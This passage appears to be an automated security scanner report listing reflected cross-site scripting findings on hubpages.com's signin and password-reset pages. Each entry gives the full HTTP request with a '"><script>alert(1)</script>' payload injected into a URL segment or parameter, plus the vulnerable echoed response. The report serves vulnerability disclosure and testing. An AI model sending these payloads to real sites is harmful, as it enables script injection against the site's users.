User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...
1.92. https://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...
1.93. https://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...
1.94. https://hubpages.com/signin/ [explain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.95. https://hubpages.com/signin/ [explain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.96. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.97. https://hubpages.com/signin/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.98. https://hubpages.com/signin/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.99. https://hubpages.com/signin/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.100. https://hubpages.com/signin/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...
1.101. https://hubpages.com/signin/reset/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...
1.102. https://hubpages.com/signin/reset/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...
1.103. https://hubpages.com/signin/reset/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...
1.104. https://hubpages.com/signin/reset/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
